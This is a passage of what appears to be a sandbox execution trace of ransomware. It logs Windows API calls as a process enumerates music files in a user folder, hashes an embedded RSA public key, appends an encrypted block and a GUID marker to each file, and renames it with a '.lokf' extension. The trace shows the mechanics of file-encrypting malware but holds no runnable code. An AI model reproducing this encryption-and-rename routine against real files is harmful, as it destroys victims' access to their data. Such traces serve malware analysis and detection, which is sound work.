KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.814] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.815] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.815] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.815] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.815] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.815] GetLastError () returned 0x0 [0060.815] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.815] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.815] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.815] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.815] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.816] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86058 | out: hHeap=0x660000) returned 1 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86070 | out: hHeap=0x660000) returned 1 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86070 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c86058 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86070 | out: hHeap=0x660000) returned 1 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86058 | out: hHeap=0x660000) returned 1 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.816] GetCurrentThreadId () returned 0x9e0 [0060.816] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8b8d0 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b87a8 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.817] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.817] GetCurrentThreadId () returned 0x9e0 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.817] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e2e8 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.817] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.817] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.817] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e2e8 | out: hHeap=0x660000) returned 1 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.817] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.817] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86058 [0060.817] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86070 [0060.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86040 [0060.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0060.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0060.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86088 [0060.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.819] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe109, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.819] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.819] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.819] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.819] CloseHandle (hObject=0x5cc) returned 1 [0060.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228c60 [0060.820] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8d0) returned 0x3268798 [0060.820] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\KnXQ3aRo433TX.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\knxq3aro433tx.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\KnXQ3aRo433TX.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\knxq3aro433tx.m4a.lokf")) returned 1 [0060.821] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x446fabc0, ftCreationTime.dwHighDateTime=0x1d4cb48, ftLastAccessTime.dwLowDateTime=0x96a39700, ftLastAccessTime.dwHighDateTime=0x1d4c70e, ftLastWriteTime.dwLowDateTime=0x96a39700, ftLastWriteTime.dwHighDateTime=0x1d4c70e, nFileSizeHigh=0x0, nFileSizeLow=0x11b7b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OGyk 6D.m4a", cAlternateFileName="OGYK6D~1.M4A")) returned 1 [0060.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.821] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\OGyk 6D.m4a") returned=".m4a" [0060.821] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\OGyk 6D.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\ogyk 6d.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.822] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=72571) returned 1 [0060.822] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.824] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11b55, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.824] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.825] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.825] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x11b7b, lpOverlapped=0x0) returned 1 [0060.825] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.825] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.825] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.825] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.825] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.826] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.826] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.826] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.826] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.826] GetLastError () returned 0x0 [0060.826] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.826] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.826] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.826] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.826] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.826] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.827] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.827] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.827] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11b7b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.827] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.827] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.828] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.828] CloseHandle (hObject=0x5cc) returned 1 [0060.829] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228c60 [0060.829] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.829] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\OGyk 6D.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\ogyk 6d.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\OGyk 6D.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\ogyk 6d.m4a.lokf")) returned 1 [0060.830] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe352af30, ftCreationTime.dwHighDateTime=0x1d4cc6f, ftLastAccessTime.dwLowDateTime=0xe5f599b0, ftLastAccessTime.dwHighDateTime=0x1d4d2c7, ftLastWriteTime.dwLowDateTime=0xe5f599b0, ftLastWriteTime.dwHighDateTime=0x1d4d2c7, nFileSizeHigh=0x0, nFileSizeLow=0x11207, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OQFFt8mL.mp3", cAlternateFileName="")) returned 1 [0060.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.830] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\OQFFt8mL.mp3") returned=".mp3" [0060.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\OQFFt8mL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\oqfft8ml.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.830] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=70151) returned 1 [0060.830] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.833] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x111e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.833] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.833] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.834] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x11207, lpOverlapped=0x0) returned 1 [0060.834] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.834] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.834] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.834] lstrlenA (lpString="-----BEGIN PUBLIC 